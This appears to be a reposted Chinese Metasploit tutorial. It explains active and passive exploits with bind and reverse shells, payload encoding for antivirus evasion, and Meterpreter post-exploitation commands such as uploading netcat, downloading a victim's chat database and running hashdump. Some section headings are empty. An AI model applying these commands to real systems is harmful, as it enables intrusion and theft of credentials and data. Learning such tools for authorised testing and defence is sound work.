Metasploit常用命令、技术功能模块
Metasploit——辅助模块(Auxiliary)
目录
1.Exploit模块
2.生成Payload
3.Meterpreter常用命令
4.弱点扫描
1.Exploit模块
Active exploits主动:攻击者主动向目标发起漏洞利用代码,触发漏洞
目标开放一个端口(服务),允许外界计算机连接这个端口(访问这个服务),通常被称为
某种服务器(比如开放80,http,称为web服务器;开放21,ftp,称为ftp服务器)。
A发送某种类型的漏洞利用代码给B,这个漏洞利用代码利用之后,加载payload,在B
上执行payload之后,有两种情况:
1.在B上再打开一个payload开放的shell侦听端口
2.B不开放端口,它会反向连接A的一个端口
Passive exploits被动:在这种情况下,B是不会开放端口的,即使开放了端口也是不存在漏洞
的,它的漏洞存在于本机的一些客户端软件(比如浏览器、PDF阅读器、Java的客户端程
序),不会侦听一个端口,也不会提供一个服务。
既然是客户端,他就要去访问一个某些服务器上的一些服务,当它访问的时候,如果服
务器端上放置了一个漏洞利用代码的话,由于客户程序存在漏洞,当使用存在漏洞的客
户端程序访问了一些存在了exploits漏洞利用代码的服务器端程序,也会导致服务器端
exploits漏洞利用的代码,由于B请求A,就作为A的响应报文把漏洞利用代码内容返回给
B,造成客户端程序漏洞被利用,然后payload加载,
1.本地绑定一个侦听端口,等攻击者连接;
2.本地不侦听端口,反弹连接给A侦听的另外一个端口,连接后,B就把shell给A
注:攻击者诱使你用存在漏洞的客户端程序,访问存在漏洞利用代码的服务端程序(恶意伪造
的站点),把漏洞利用代码从恶意服务器端下载到本地,执行,导致本地客户端程序被利
用,导致payload加载,出现反弹的shell或直连的shell。
判断主动还是被动,是看漏洞利用代码,是主动发过去的,还是被动等待客户端连接服务器端而造成客户端漏洞被利用
实验:关闭目标win7的防火墙,主动发起漏洞利用代码,可以拿到shell
实验:开启目标win xp sp2的防火墙,无法主动连接目标了,所以利用被动连接方式
需要创建一个存在exploits漏洞利用代码的站点(网站),诱使客户端来连接这个网站。
利用了xp sp2上浏览器的漏洞
2.生成Payload
绕过坏字符,就是将其编码,一定程度上起到混淆,免杀的效果
search encoders搜索有哪些编码
-b排除坏字符,-t输出文件格式,-e指定encoder,-i使用5轮,-k线程,-x模板,-f输出文件
示例:generate -t c -s 30
generate -t python -s 30
3.Meterpreter常用命令
- 高级、动态、可扩展的Payload
基于meterpreter上下文利用更多漏洞发起攻击
后渗透测试阶段一站式操作界面
- 完全基于内存的DLL注入时payload(不写硬盘)
注入到合法系统进程并建立stager
基于Stager上传和预加载DLL进行扩展模块注入(客户端API)
基于Stager建立的socket连接建立加密的TLS/1.0通信隧道
利用TLS隧道进一步加载后续扩展模块(避免网络取证)
- 服务端使用C语言编写
- 客户端提供基于Ruby的全特效API(支持任何语言)
help # 查看Meterpreter帮助
background #返回,把meterpreter后台挂起
bgkill # 杀死一个背景 meterpreter 脚本
bglist #提供所有正在运行的后台脚本的列表
bgrun #作为一个后台线程运行脚本
channel #显示活动频道
sessions -i number #与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter #会话已继续利用
sesssions -k number #与会话进行交互
close #关闭通道
exit #终止 meterpreter 会话
quit #终止 meterpreter 会话
interact id #切换进一个信道
run #执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有
#autoroute,hashdump,arp_scanner,multi_meter_inject等
irb #进入 Ruby 脚本模式
read #从通道读取数据
write #将数据写入到一个通道
run和bgrun #前台和后台执行以后它选定的 meterpreter 脚本
use #加载 meterpreter 的扩展
load/use #加载模块
Resource #执行一个已有的rc脚本
-----------------------------------------------------------------------
文件系统命令
cat c:\boot.ini #查看文件内容,文件必须存在
del c:\boot.ini #删除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload setup.exe C:\\windows\\system32\
download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/
edit c:\boot.ini # 编辑文件
getlwd #打印本地目录
getwd #打印工作目录
lcd #更改本地目录
ls #列出在当前目录中的文件列表
lpwd #打印本地目录
pwd #输出工作目录
cd c:\\ #进入目录文件下
rm file #删除文件
mkdir dier #在受害者系统上的创建目录
rmdir #受害者系统上删除目录
dir #列出目标主机的文件和文件夹信息
mv #修改目标主机上的文件名
search -d d:\\www -f web.config #search 文件,如search -d c:\\ -f*.doc
meterpreter > search -f autoexec.bat #搜索文件
meterpreter > search -f sea*.bat c:\\xamp\\
enumdesktops #用户登录数
迁移
Meterpreter python扩展
4.弱点扫描
文章来源:https://www.toymoban.com/news/detail-502726.html
文章来源地址https://www.toymoban.com/news/detail-502726.html
到了这里,关于Metasploit——渗透攻击模块(Exploit)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!